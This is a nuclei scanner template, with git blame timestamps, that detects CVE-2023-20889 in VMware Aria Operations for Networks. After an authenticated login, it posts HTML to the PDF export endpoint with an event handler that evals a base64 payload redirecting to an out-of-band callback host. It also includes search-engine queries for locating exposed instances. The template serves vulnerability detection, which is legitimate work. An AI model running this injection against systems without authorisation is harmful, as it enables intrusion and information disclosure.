nuclei-templates/http/cves/2023/CVE-2023-20889.yaml

98 lines
3.3 KiB
YAML
Raw Normal View History

2023-06-27 08:41:53 +00:00
id: CVE-2023-20889
info:
2023-06-28 03:50:57 +00:00
name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability
2023-06-27 08:41:53 +00:00
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the latest security patches provided by VMware to mitigate this vulnerability.
2023-06-27 08:41:53 +00:00
reference:
2023-06-28 03:50:57 +00:00
- https://www.zerodayinitiative.com/advisories/ZDI-23-842/
2023-06-27 08:41:53 +00:00
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20889
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-06-27 08:41:53 +00:00
cve-id: CVE-2023-20889
2023-07-11 19:49:27 +00:00
cwe-id: CWE-77
2024-05-31 19:23:20 +00:00
epss-score: 0.37918
epss-percentile: 0.9721
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
2023-06-27 08:41:53 +00:00
metadata:
verified: true
2023-06-28 04:57:47 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: vmware
product: vrealize_network_insight
shodan-query:
- title:"VMware Aria Operations"
- http.title:"vmware vrealize network insight"
- http.title:"vmware aria operations"
fofa-query:
- title="vmware vrealize network insight"
- title="vmware aria operations"
google-query:
- intitle:"vmware aria operations"
- intitle:"vmware vrealize network insight"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive
2023-06-27 08:41:53 +00:00
variables:
2023-07-11 19:49:27 +00:00
payload: location='http://{{interactsh-url}}'
2023-06-27 08:41:53 +00:00
http:
- raw:
- |
POST /api/auth/login HTTP/2
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
X-Vrni-Csrf-Token: null
{"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
- |
POST /api/pdfexport HTTP/2
Host: {{Hostname}}
X-Vrni-Csrf-Token: {{csrf}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh
Content-Disposition: form-data; name="{{randstr}}"
<!DOCTYPE HTML>
<html>
<head>
<title>Test</title>
</head>
<body>
<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="eval(atob('{{base64(payload)}}'))"></xss></p>
</body>
</html>
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- http
- type: word
2023-06-28 04:56:23 +00:00
part: header_2
2023-06-27 08:41:53 +00:00
words:
2023-07-11 19:49:27 +00:00
- application/octet-stream
2023-06-27 08:41:53 +00:00
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
2023-07-11 19:49:27 +00:00
- csrfToken":"([a-z0-9A-Z/+=]+)"
2023-06-27 08:41:53 +00:00
internal: true
2023-07-11 19:49:27 +00:00
part: body
# digest: 490a00463044022055b10fc56ee43cdb8ca9c694251abb76a7705cdcbede4f4f70fdcf5571f7a5b502201c3ab21258337ff42f17b2eefe0b93936df34bf1675d361b0c5d3e3f634bf301:922c64590222798bb761d5b6d8e72950